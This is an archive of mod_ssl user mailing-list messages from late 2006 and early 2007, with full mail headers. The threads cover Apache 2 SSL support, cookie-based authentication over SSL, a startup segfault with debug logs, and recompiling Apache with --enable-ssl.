In-Reply-To: <7ac1e90c0612291231x2ecfabf7n2e1eccfe146efe2c@mail.gmail.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Dec 29, 2006 at 08:31:32PM +0000, Bahadir Balban wrote:
> Does mod_ssl work on Apache 2.x? Why does it say mod_ssl is for 1.3 
> everywhere?

Because the version of mod_ssl you find at modssl.org is only for 1.3.
> 
> Is there any other ssl solution to apache 2.x?
> 
--enable-ssl when configuring apache 2 - mod_ssl is included in the
apache httpd-2.x source.

vh

Mads Toftum
-- 
http://soulfood.dk
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 29 22:46:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2ECFD14D858; Fri, 29 Dec 2006 22:46:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187])
	by master.modssl.org (Postfix) with ESMTP id 3AE6D14D82B
	for ; Fri, 29 Dec 2006 22:46:44 +0100 (CET)
Received: by nf-out-0910.google.com with SMTP id p48so5336090nfa
        for ; Fri, 29 Dec 2006 13:46:20 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=e++kEs12EmaUyLU/3J27RaY0QXbE1wk0wO7co+nwVN1u16F6+G7UltRy5brD1jMEjZYwjdTBqOHq7R/V7d5DxWfu5EIRhKMyTdUe8F5JDScpsy/kieM02g5Wcd1UM3oCTuPfhqqAG00Bl6dygDmiEYKWi+So5c1CYe2tnG6gf+U=
Received: by 10.82.179.9 with SMTP id b9mr1136802buf.1167428780668;
        Fri, 29 Dec 2006 13:46:20 -0800 (PST)
Received: by 10.82.186.15 with HTTP; Fri, 29 Dec 2006 13:46:20 -0800 (PST)
Message-ID: <7ac1e90c0612291346s31058c16m4e9df6289e4320c7@mail.gmail.com>
Date: Fri, 29 Dec 2006 21:46:20 +0000
From: "Bahadir Balban" 
To: modssl-users@modssl.org
Subject: beyond basic authentication
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bahadir Balban" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

In apache documentation I only see references to "basic
authentication" be it with hashing or with a dbm file.

In windows asp.net also mentioned is a "forms-based authentication",
which I believe can also be implemented on apache. Is there a
walkthrough guide for anything beyond basic authentication on apache?

For example, how could I serve content based on username, how could I
send passwords in encrypted form? How could I make use of signed
cookies, maintain a session with the same user, etc. Any books to
cover such web development recipes using apache? Preferably using
mod_python?

Thanks,
Bahadir
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 29 23:06:57 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 02F5914D858; Fri, 29 Dec 2006 23:06:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from prospero.kbc.net.au (prospero.kbc.net.au [150.101.97.167])
	by master.modssl.org (Postfix) with ESMTP id CA72F14D82B
	for ; Fri, 29 Dec 2006 23:06:55 +0100 (CET)
Received: from [10.10.10.210] (caliban [10.10.10.210])
	by prospero.kbc.net.au (Postfix) with ESMTP id 37A329CB13
	for ; Sat, 30 Dec 2006 08:36:29 +1030 (CST)
Message-ID: <45959164.6050404@kbc.net.au>
Date: Sat, 30 Dec 2006 08:36:28 +1030
From: Matthew Smith 
User-Agent: Thunderbird 1.5.0.9 (X11/20061206)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: beyond basic authentication
References: <7ac1e90c0612291346s31058c16m4e9df6289e4320c7@mail.gmail.com>
In-Reply-To: <7ac1e90c0612291346s31058c16m4e9df6289e4320c7@mail.gmail.com>
X-Enigmail-Version: 0.94.1.2
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matthew Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Quoth Bahadir Balban at 12/30/2006 08:16 AM...

> For example, how could I serve content based on username, how could I
> send passwords in encrypted form? How could I make use of signed
> cookies, maintain a session with the same user, etc. Any books to
> cover such web development recipes using apache? Preferably using
> mod_python?

All you need to do is to maintain state, either by using cookies
(easiest) or by getting your software to maintain persistent variables
through the query string (messy).

As this is the modssl list, I am assuming that you are doing this
through an SSL connection.  Passwords, therefore, would be encrypted
along with the rest of the data.

So, you send the encrypted user name and password and - if OK - set a
cookie that contains the user name and a hash (MD5,SHA1,etc) of the user
name and a secret string provided by the server.  (Or just the user name
and a hash of the user name and password that can be checked every time
you change page.)

You would need to either a) know that your clients can all accept
cookies, such as in an intranet situation, b) have a fall-back mechanism
to work when cookies are not available or c) disclaim that your system
will not work without cookies.  You may be able to get away with this,
but check up on your local accessibility laws (if any).

One thing to always bear in mind is that - except in an intranet
situation - you cannot assume anything of the user agent.  If you do
anything clever using JavaScript, say to create a name/password hash
client-side, always provide a means of fallback in case  the method
(JavaScript, etc), is not available.

So, you don't really need to involve Apache in the equation, as your
scripted solution (mod_python, etc) can take care of this.  PHP is
rather clever in this respect in that it can look after session
variables [to preserve state] for you.  I have written similar
mechanisms in Perl, but prefer the PHP solution as it is easier.

At the end of the day, personally, I use basic authentication + SSL for
all my applications.  The only disadvantage is the restriction of one
SSL virtual host per IP address/port.

Hope this gives you some ideas.

Cheers

M

-- 
Matthew Smith
IT Consultancy & Web Application Development
Business: http://www.kbc.net.au/
Personal: http://www.smiffysplace.com/
LinkedIn: http://www.linkedin.com/in/smiffy
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Dec 30 07:57:31 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C539B14D86C; Sat, 30 Dec 2006 07:57:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.reoins.com (mail.reoins.com [209.163.210.42])
	by master.modssl.org (Postfix) with ESMTP id 4CE2A14D858
	for ; Sat, 30 Dec 2006 07:57:30 +0100 (CET)
Received: from [10.19.78.51] ([66.136.59.89])
  (AUTH: LOGIN marcos@fulgentcorp.com)
  by mail.reoins.com with esmtp; Sat, 30 Dec 2006 00:56:42 -0600
  id 00033C8E.45960DAA.0000E9ED
Mime-Version: 1.0 (Apple Message framework v752.2)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Mark Robinson 
Subject: apache segfaults on startup after specifying the certificate file and key
Date: Sat, 30 Dec 2006 00:57:05 -0600
X-Mailer: Apple Mail (2.752.2)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Robinson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,
I am running freebsd 6.1 and apache 2.2.0_7
I am new to SSL and have configured a self-signed certificate  
according to http://slacksite.com/apache/certificate.html
I placed the .crt and .pem files in /usr/local/etc/apache22 and set  
the .pem file readable only by root
When I start up apache it gives a segmentation fault and stops.
When set the logging option in httpd.conf to debug.
The log file shows the following before the seg fault:

[Sat Dec 30 00:48:27 2006] [info] Init: Seeding PRNG with 136 bytes  
of entropy
[Sat Dec 30 00:48:27 2006] [info] Loading certificate & private key  
of SSL-aware server
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_pphrase.c(469):  
unencrypted RSA private key - pass phrase not required
[Sat Dec 30 00:48:27 2006] [info] Init: Generating temporary RSA  
private keys (512/1024 bits)
[Sat Dec 30 00:48:27 2006] [info] Init: Generating temporary DH  
parameters (512/1024 bits)
[Sat Dec 30 00:48:27 2006] [info] Init: Initializing (virtual)  
servers for SSL
[Sat Dec 30 00:48:27 2006] [info] Configuring server for SSL protocol
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(405): Creating  
new SSL context (protocols: SSLv2, SSLv3, TLSv1)
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(601):  
Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH: 
+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(729):  
Configuring RSA server certificate
[Sat Dec 30 00:48:27 2006] [warn] RSA server certificate CommonName  
(CN) `mail.reoins.com' does NOT match server name!?
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(768):  
Configuring RSA server private key
[Sat Dec 30 00:48:27 2006] [info] Server: Apache/2.2.0, Interface:  
mod_ssl/2.2.0, Library: OpenSSL/0.9.8a
[Sat Dec 30 00:48:27 2006] [info] mod_unique_id: using ip addr  
209.163.210.42

Thanks for any help or suggestions.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 31 06:52:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C56A614D889; Sun, 31 Dec 2006 06:52:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.236])
	by master.modssl.org (Postfix) with ESMTP id 3C7B514D83F
	for ; Sun, 31 Dec 2006 06:52:48 +0100 (CET)
Received: by nz-out-0506.google.com with SMTP id o37so2974084nzf
        for ; Sat, 30 Dec 2006 21:52:23 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=EwC+pTUpIgPqZPjjxSBemG+lQ9ZdqaF+NxRW0kweDaQe8/4pePqQkkNmHPABidmGF2Hgvq445sLNmb57R4kbWlC+GZxqtcVkZz9prJykAl4s9amFh2JJLR84KbMwFSwwqwQwfqLQqyTcdX+We9Z5lv5hT4NzRMoInyP0N/QECx8=
Received: by 10.65.15.17 with SMTP id s17mr8746642qbi.1167544343582;
        Sat, 30 Dec 2006 21:52:23 -0800 (PST)
Received: by 10.65.234.8 with HTTP; Sat, 30 Dec 2006 21:52:23 -0800 (PST)
Message-ID: <740f716a0612302152p2222e240x306678a8ab2d0719@mail.gmail.com>
Date: Sat, 30 Dec 2006 21:52:23 -0800
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Re: apache segfaults on startup after specifying the certificate file and key
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_114374_26768653.1167544343198"
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_114374_26768653.1167544343198
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

You will have better luck on the apache mailing lists (
http://httpd.apache.org) as mod_ssl on this website, as told on modssl.org,
is only for apache 1.x. As of 2.x modssl is incorporated into the apache
distribution and is also maintained by the apache http server project.

On 12/29/06, Mark Robinson  wrote:
>
> Hi all,
> I am running freebsd 6.1 and apache 2.2.0_7
> I am new to SSL and have configured a self-signed certificate
> according to http://slacksite.com/apache/certificate.html
> I placed the .crt and .pem files in /usr/local/etc/apache22 and set
> the .pem file readable only by root
> When I start up apache it gives a segmentation fault and stops.
> When set the logging option in httpd.conf to debug.
> The log file shows the following before the seg fault:
>
> [Sat Dec 30 00:48:27 2006] [info] Init: Seeding PRNG with 136 bytes
> of entropy
> [Sat Dec 30 00:48:27 2006] [info] Loading certificate & private key
> of SSL-aware server
> [Sat Dec 30 00:48:27 2006] [debug] ssl_engine_pphrase.c(469):
> unencrypted RSA private key - pass phrase not required
> [Sat Dec 30 00:48:27 2006] [info] Init: Generating temporary RSA
> private keys (512/1024 bits)
> [Sat Dec 30 00:48:27 2006] [info] Init: Generating temporary DH
> parameters (512/1024 bits)
> [Sat Dec 30 00:48:27 2006] [info] Init: Initializing (virtual)
> servers for SSL
> [Sat Dec 30 00:48:27 2006] [info] Configuring server for SSL protocol
> [Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(405): Creating
> new SSL context (protocols: SSLv2, SSLv3, TLSv1)
> [Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(601):
> Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:
> +MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
> [Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(729):
> Configuring RSA server certificate
> [Sat Dec 30 00:48:27 2006] [warn] RSA server certificate CommonName
> (CN) `mail.reoins.com' does NOT match server name!?
> [Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(768):
> Configuring RSA server private key
> [Sat Dec 30 00:48:27 2006] [info] Server: Apache/2.2.0, Interface:
> mod_ssl/2.2.0, Library: OpenSSL/0.9.8a
> [Sat Dec 30 00:48:27 2006] [info] mod_unique_id: using ip addr
> 209.163.210.42
>
> Thanks for any help or suggestions.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

------=_Part_114374_26768653.1167544343198
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

You will have better luck on the apache mailing lists (http://httpd.apache.org) as mod_ssl on this website, as told on modssl.org, is only for apache 1.x
. As of 2.x modssl is incorporated into the apache distribution and is also maintained by the apache http server project. 

On 12/29/06, Mark Robinson <
marcos@fulgentcorp.com> wrote:
Hi all,

I am running freebsd 6.1 and apache 2.2.0_7
I am new to SSL and have configured a self-signed certificate
according to http://slacksite.com/apache/certificate.html

I placed the .crt and .pem files in /usr/local/etc/apache22 and set
the .pem file readable only by root
When I start up apache it gives a segmentation fault and stops.
When set the logging option in httpd.conf
 to debug.
The log file shows the following before the seg fault:

[Sat Dec 30 00:48:27 2006] [info] Init: Seeding PRNG with 136 bytes
of entropy
[Sat Dec 30 00:48:27 2006] [info] Loading certificate & private key

of SSL-aware server
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_pphrase.c(469):
unencrypted RSA private key - pass phrase not required
[Sat Dec 30 00:48:27 2006] [info] Init: Generating temporary RSA
private keys (512/1024 bits)

[Sat Dec 30 00:48:27 2006] [info] Init: Generating temporary DH
parameters (512/1024 bits)
[Sat Dec 30 00:48:27 2006] [info] Init: Initializing (virtual)
servers for SSL
[Sat Dec 30 00:48:27 2006] [info] Configuring server for SSL protocol

[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(405): Creating
new SSL context (protocols: SSLv2, SSLv3, TLSv1)
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(601):
Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:

+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(729):
Configuring RSA server certificate
[Sat Dec 30 00:48:27 2006] [warn] RSA server certificate CommonName
(CN) `mail.reoins.com' does NOT match server name!?

[Sat Dec 30 00:48:27 2006] [debug] ssl_engine_init.c(768):
Configuring RSA server private key
[Sat Dec 30 00:48:27 2006] [info] Server: Apache/2.2.0, Interface:
mod_ssl/2.2.0, Library: OpenSSL/0.9.8a
[Sat Dec 30 00:48:27 2006] [info] mod_unique_id: using ip addr

209.163.210.42

Thanks for any help or suggestions.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            
majordomo@modssl.org



------=_Part_114374_26768653.1167544343198--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  3 19:23:14 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 69BBD14D9DA; Wed,  3 Jan 2007 19:23:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.headsprout.com (mail.headsprout.com [207.195.230.84])
	by master.modssl.org (Postfix) with ESMTP id D946714D82E
	for ; Wed,  3 Jan 2007 19:23:13 +0100 (CET)
Received: from [192.168.1.230] ([71.240.121.212])
	(authenticated user robert@headsprout.com)
	by mail.headsprout.com
	for modssl-users@modssl.org;
	Wed, 3 Jan 2007 10:22:45 -0800
Mime-Version: 1.0 (Apple Message framework v752.2)
In-Reply-To: <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
References: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com> <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: <6AD688C7-9B74-48CE-B93D-E83CBEECB6A6@headsprout.com>
Content-Transfer-Encoding: 7bit
From: Robert Denton 
Subject: Apache man-in-the-middle settings
Date: Wed, 3 Jan 2007 13:22:44 -0500
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.752.2)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Denton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,  I am told that there is a setting in apache that will drop  
connections if the destination changes.  This, ideally, should help  
prevent man-in-the-middle attacks.  However, this also causes  
problems with clients that load balance between ISP's.  What setting  
does this?  Thanks!

Robert

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 10 21:57:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1D1B714D9E8; Wed, 10 Jan 2007 21:57:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from CLICKPDC.clickhq.clickability.com (dsl092-186-099.sfo1.dsl.speakeasy.net [66.92.186.99])
	by master.modssl.org (Postfix) with ESMTP id 1085014D9DA
	for ; Wed, 10 Jan 2007 21:57:21 +0100 (CET)
Received: from [192.168.3.136] ([192.168.3.136]) by CLICKPDC.clickhq.clickability.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 10 Jan 2007 13:00:37 -0800
Message-ID: <45A55291.9010506@klxsystems.net>
Date: Wed, 10 Jan 2007 12:54:41 -0800
From: "Karl R. Balsmeier" 
User-Agent: Debian Thunderbird 1.0.7 (X11/20051207)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: 2.0.58 compiled - forgot to/need to --enable ssl
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 10 Jan 2007 21:00:37.0343 (UTC) FILETIME=[60C65EF0:01C734FA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Karl R. Balsmeier" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I.

Is there a way to add the SSL support "after the fact?"  I compiled and 
simply forgot to add the flag.  The flag I used to compile is:

./configure --prefix=/usr/local/apache --enable-mods-shared=most

What would I do to simply add the SSL in afterward?  From what I can 
tell this shop doesn't do the DSO approach, so that's perhaps not an option.

Is there a static way to do this or should I start from scratch?

II.
REMOVAL question:

If I need to wipe it all and start from scratch -is there a smart way to 
go about removing apache? 

Here's what I did in total, it's been working great, save for my error 
in not getting SSL on there.  -would I be better off with just using 
enable-mods-shared ALL (that includes SSL right?)

cd /usr/local/src

wget http://www.mirrorgeek.com/apache.org/httpd/httpd-2.0.58.tar.gz

tar -xzf httpd-2.0.58.tar.gz
cd httpd-2.0.58

./configure --prefix=/usr/local/apache --enable-mods-shared=most

make

make install

ln -s /usr/local/apache/bin/apachectl /etc/rc.d/init.d/httpd

cp -v /usr/local/src/build/configs/httpd.conf /usr/local/apache/conf/

cp -v /usr/local/src/build/configs/index.html /usr/local/apache/htdocs/

vi /usr/local/apache/conf/httpd.conf



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 11 11:57:31 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 12E7014D853; Thu, 11 Jan 2007 11:57:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wr-out-0506.google.com (wr-out-0506.google.com [64.233.184.232])
	by master.modssl.org (Postfix) with ESMTP id A994F14D836
	for ; Thu, 11 Jan 2007 11:57:30 +0100 (CET)
Received: by wr-out-0506.google.com with SMTP id i7so328899wra
        for ; Thu, 11 Jan 2007 02:57:03 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=lhDQW6nRDVZ6gSq2mcbxUWAocT1bpwiWSJ8IFAzt79mB/OR2oNu/meA9eP1B7gy5GpAu9GMg2NV8vB7lEBynm0wmZPeFIATGqel3Om9SMbtKL7e1ALxYSGt0ZF63c2egN8KfORcR5FDZacI+JLhpVqVSDBUvLZp7k8JcSHUF9y0=
Received: by 10.65.250.14 with SMTP id c14mr1857217qbs.1168513023792;
        Thu, 11 Jan 2007 02:57:03 -0800 (PST)
Received: by 10.65.139.3 with HTTP; Thu, 11 Jan 2007 02:57:03 -0800 (PST)
Message-ID: 
Date: Thu, 11 Jan 2007 10:57:03 +0000
From: "Shahadat Hossain" 
To: modssl-users@modssl.org
Subject: Re: 2.0.58 compiled - forgot to/need to --enable ssl
In-Reply-To: <45A55291.9010506@klxsystems.net>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_17174_24754395.1168513023753"
References: <45A55291.9010506@klxsystems.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shahadat Hossain" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_17174_24754395.1168513023753
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

As far as I know, if you install openSSL, that actually configure apache to
use SSL. But I never tried that (so, don't shout at me if it does not work,
ok?).

And if you want to install apache again, thats pretty simple. Just do the
whole installation process once again. This time make sure to include the
switches. This will simply overwrite the old files and you will be able to
get it up without any further trouble.

(Please remember, I do not take any responsibility for the free advice I
give ;-)  )

--Hossain


On 1/10/07, Karl R. Balsmeier  wrote:
>
> I.
>
> Is there a way to add the SSL support "after the fact?"  I compiled and
> simply forgot to add the flag.  The flag I used to compile is:
>
> ./configure --prefix=/usr/local/apache --enable-mods-shared=most
>
> What would I do to simply add the SSL in afterward?  From what I can
> tell this shop doesn't do the DSO approach, so that's perhaps not an
> option.
>
> Is there a static way to do this or should I start from scratch?
>
> II.
> REMOVAL question:
>
> If I need to wipe it all and start from scratch -is there a smart way to
> go about removing apache?
>
> Here's what I did in total, it's been working great, save for my error
> in not getting SSL on there.  -would I be better off with just using
> enable-mods-shared ALL (that includes SSL right?)
>
> cd /usr/local/src
>
> wget http://www.mirrorgeek.com/apache.org/httpd/httpd-2.0.58.tar.gz
>
> tar -xzf httpd-2.0.58.tar.gz
> cd httpd-2.0.58
>
> ./configure --prefix=/usr/local/apache --enable-mods-shared=most
>
> make
>
> make install
>
> ln -s /usr/local/apache/bin/apachectl /etc/rc.d/init.d/httpd
>
> cp -v /usr/local/src/build/configs/httpd.conf /usr/local/apache/conf/
>
> cp -v /usr/local/src/build/configs/index.html /usr/local/apache/htdocs/
>
> vi /usr/local/apache/conf/httpd.conf
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>



-- 
I'm changing everyday...
so are my views...
hence I deny any responsibility/(ies)...
for what I said yesterday... ;-)

------=_Part_17174_24754395.1168513023753
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


As far as I know, if you install openSSL, that actually configure apache to use SSL. But I never tried that (so, don't shout at me if it does not work, ok?). 


 


And if you want to install apache again, thats pretty simple. Just do the whole installation process once again. This time make sure to include the switches. This will simply overwrite the old files and you will be able to get it up without any further trouble.



 


(Please remember, I do not take any responsibility for the free advice I give ;-)  )


 


--Hossain

 


On 1/10/07, Karl R. Balsmeier <karl@klxsystems.net> wrote:

I.

Is there a way to add the SSL support "after the fact?"  I compiled and
simply forgot to add the flag.  The flag I used to compile is:


./configure --prefix=/usr/local/apache --enable-mods-shared=most

What would I do to simply add the SSL in afterward?  From what I can
tell this shop doesn't do the DSO approach, so that's perhaps not an option.


Is there a static way to do this or should I start from scratch?

II.
REMOVAL question:

If I need to wipe it all and start from scratch -is there a smart way to
go about removing apache?


Here's what I did in total, it's been working great, save for my error
in not getting SSL on there.  -would I be better off with just using
enable-mods-shared ALL (that includes SSL right?)

cd /usr/local/src


wget http://www.mirrorgeek.com/apache.org/httpd/httpd-2.0.58.tar.gz

tar -xzf httpd-2.0.58.tar.gz
cd httpd-2.0.58

./configure --prefix=/usr/local/apache --enable-mods-shared=most


make

make install

ln -s /usr/local/apache/bin/apachectl /etc/rc.d/init.d/httpd

cp -v /usr/local/src/build/configs/httpd.conf /usr/local/apache/conf/

cp -v /usr/local/src/build/configs/index.html /usr/local/apache/htdocs/


vi /usr/local/apache/conf/httpd.conf



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            
majordomo@modssl.org



-- 
I'm changing everyday...
so are my views...
hence I deny any responsibility/(ies)...
for what I said yesterday... ;-) 

------=_Part_17174_24754395.1168513023753--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 12 01:01:19 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 50A8C14D856; Fri, 12 Jan 2007 01:01:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from CLICKPDC.clickhq.clickability.com (dsl092-186-099.sfo1.dsl.speakeasy.net [66.92.186.99])
	by master.modssl.org (Postfix) with ESMTP id 253DF14D841
	for ; Fri, 12 Jan 2007 01:01:15 +0100 (CET)
Received: from [192.168.3.136] ([192.168.3.136]) by CLICKPDC.clickhq.clickability.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 11 Jan 2007 16:04:31 -0800
Message-ID: <45A6CFAF.8030407@klxsystems.net>
Date: Thu, 11 Jan 2007 16:00:47 -0800
From: "Karl R. Balsmeier" 
User-Agent: Debian Thunderbird 1.0.7 (X11/20051207)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: 2.0.58 compiled - forgot to/need to --enable ssl
References: <45A55291.9010506@klxsystems.net> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 12 Jan 2007 00:04:31.0500 (UTC) FILETIME=[3C0EDCC0:01C735DD]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Karl R. Balsmeier" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I actually did an rm command on /usr/local/apache, and rm on 
/etc/rc.d/init.d/httpd symlink I had for apachectl, and redid the 
install with the --enable-ssl  and it worked great with apachectl startssl.




